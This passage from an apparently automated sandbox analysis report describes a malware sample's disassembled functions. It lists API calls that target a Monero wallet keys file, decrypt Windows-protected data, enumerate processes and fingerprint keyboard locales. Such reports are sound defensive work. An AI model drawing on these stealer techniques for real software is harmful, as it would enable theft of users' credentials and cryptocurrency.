                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: )_r$!8n$!8n$719d$R}/$V*s$\mw$gjMY$9|
                      • API String ID: 0-306087274
                      • Opcode ID: c0d1a75898de9aaf887df7d28672cd850b9674f1d04ac10bf50ff80fcd7ad98e
                      • Instruction ID: bc953d7ca646ea60d7fee298ec5079902156710505cc4c5c0463f3f315194ba1
                      • Opcode Fuzzy Hash: c0d1a75898de9aaf887df7d28672cd850b9674f1d04ac10bf50ff80fcd7ad98e
                      • Instruction Fuzzy Hash: 5CB227F3A0C6049FE3046E2DEC8567ABBE9EBD4720F1A463DEAC4C3744E93558058697
                      Function 001D7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,001E05AF), ref: 001D7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001D7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 001D7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001D7C62
                      • LocalFree.KERNEL32(00000000), ref: 001D7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                      • Instruction ID: 42e78ddd978dd5741c2c707d564f3b322e6162c6bf8f37f008edf10f70f16de1
                      • Opcode Fuzzy Hash: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                      • Instruction Fuzzy Hash: 36416D71940228ABCB24DF94DC99BEEB378FF58700F6041DAE40962280DB742F85CFA5
                      Function 001CE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001E0D73), ref: 001CE4A2
                      • StrCmpCA.SHLWAPI(?,001E14F8), ref: 001CE4F2
                      • StrCmpCA.SHLWAPI(?,001E14FC), ref: 001CE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                      • Instruction ID: 3a6bbf247d11cfd55fd86ad8f296845e6593ee70615a29b4bed862babd161d84
                      • Opcode Fuzzy Hash: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                      • Instruction Fuzzy Hash: 8E1246719101549BDB18FB70DCA6EEE7378AF64300FC045AAB50A96291EF306F49CF96
                      Function 0059444A Relevance: 9.1, Strings: 6, Instructions: 1636COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: %wW|$O/vw$]Q~$a{o$ed1v$GZo
                      • API String ID: 0-1058592437
                      • Opcode ID: dca32842afa0b710489ad303f8ea7ecbbe30b5b812bad2e04c7197a98a917baa
                      • Instruction ID: 8ee541b3a4e814ea34645f568e66012636c7d278b9740dcc3595d8b46e234da8
                      • Opcode Fuzzy Hash: dca32842afa0b710489ad303f8ea7ecbbe30b5b812bad2e04c7197a98a917baa
                      • Instruction Fuzzy Hash: CAB205B360C204AFE304AE29EC8567AF7E9EFD4720F1A892DE6C4C7744E63558418797
                      Function 0059EC67 Relevance: 8.8, Strings: 6, Instructions: 1261COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .&o>$AM7?$Cqs~$S^rZ$ax_'$w#wn
                      • API String ID: 0-356560627
                      • Opcode ID: 1304d46dec483294ed4b4964a04615bd1b66f1f2fdf83196dc13a5ff21c91567
                      • Instruction ID: 5075b03a0573ceb7f709830b0095cf43bbad65fdaa7db2fad3f98edfc3d83068
                      • Opcode Fuzzy Hash: 1304d46dec483294ed4b4964a04615bd1b66f1f2fdf83196dc13a5ff21c91567
                      • Instruction Fuzzy Hash: B682E7F360C600AFE304AE2DEC8577ABBE9EF94720F1A853DE6C5C7744E53598018696
                      Function 005A1E41 Relevance: 7.9, Strings: 5, Instructions: 1632COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '4Y|$+6?$.+<$STpa$v;[^
                      • API String ID: 0-1836363471
                      • Opcode ID: 69a964a06cdd3d737667768d783d052a849826e1e35ff123681e8147239470bd
                      • Instruction ID: 56056c4e5d56022f6f8d729b4b408eb533ab17179bbf6d5eab1101287459d152
                      • Opcode Fuzzy Hash: 69a964a06cdd3d737667768d783d052a849826e1e35ff123681e8147239470bd
                      • Instruction Fuzzy Hash: BFB207F390C2049FE304AE29EC8567AFBE5EF94720F1A853DEAC487744EA3558058797
                      Function 001CC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                      • lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                      • lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                      • lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 2f5c0a455db6c9f0953edcacb1d93934bc051010d54a12bcf7283ea6102faf35
                      • Instruction ID: 5b1f5888ea485de3d4157b1037588bf91de92af5cc62f9fade9c1a2ccb2574dc
                      • Opcode Fuzzy Hash: 2f5c0a455db6c9f0953edcacb1d93934bc051010d54a12bcf7283ea6102faf35
                      • Instruction Fuzzy Hash: 8A415EB590421ADBDB10DF90DD89FFEB7B8BB48704F1045A8E509B6280D7749A84CF96
                      Function 001D6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 001D696C
                      • sscanf.NTDLL ref: 001D6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69C0
                      • ExitProcess.KERNEL32 ref: 001D69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                      • Instruction ID: ba96b0b3d86b069de926744f545de427a653afba36feaa7c05b26bc2a1350a4f
                      • Opcode Fuzzy Hash: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                      • Instruction Fuzzy Hash: C021CB76D14208AFCF08EFE4D955AEEB7B9BF48304F04852AE406F3250EB345615CBA9
                      Function 001C7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001C724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001C7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001C72A4
                      • LocalFree.KERNEL32(?), ref: 001C72AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                      • Instruction ID: d261f1ddfd88882f5cb6379a272cd43dd7934c52360cf1151057a43cd4ad3bac
                      • Opcode Fuzzy Hash: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                      • Instruction Fuzzy Hash: 4D0100B5A40308BBEB14DBD4CD49F9D7778AB44700F108558FB05BB2C0D7B0AA118B69
                      Function 001D9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D961E
                      • Process32First.KERNEL32(001E0ACA,00000128), ref: 001D9632
                      • Process32Next.KERNEL32(001E0ACA,00000128), ref: 001D9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 001D965C
                      • CloseHandle.KERNEL32(001E0ACA), ref: 001D967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                      • Instruction ID: e71cd0cb5e2e9a2f63f3b9b23596574e4037a720a9c7e49e0701c7134a8d1113
                      • Opcode Fuzzy Hash: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                      • Instruction Fuzzy Hash: 8E010CB5A00308ABDB14DFA5CD48BEDB7F8EB48700F108199A905A7340E734DB50CF51
                      Function 0059298B Relevance: 6.6, Strings: 4, Instructions: 1612COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: JFk$a~~${G{$@:7
                      • API String ID: 0-4074208610
                      • Opcode ID: 6ed58c8f2736066b8b02802e8b335978fa8054ebc51ea7fd1b093d8d74bf1e68
                      • Instruction ID: c45f560f03ac8615fc09b4c1b10cf6e6a108b463b9b3d4de168c097b3d1bf19e
                      • Opcode Fuzzy Hash: 6ed58c8f2736066b8b02802e8b335978fa8054ebc51ea7fd1b093d8d74bf1e68
                      • Instruction Fuzzy Hash: 0DB2E7F3A0C204AFE704AE29EC8577ABBE9EF94320F16453DE6C5C7344E63598058697
                      Function 0059CC87 Relevance: 6.6, Strings: 4, Instructions: 1602COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
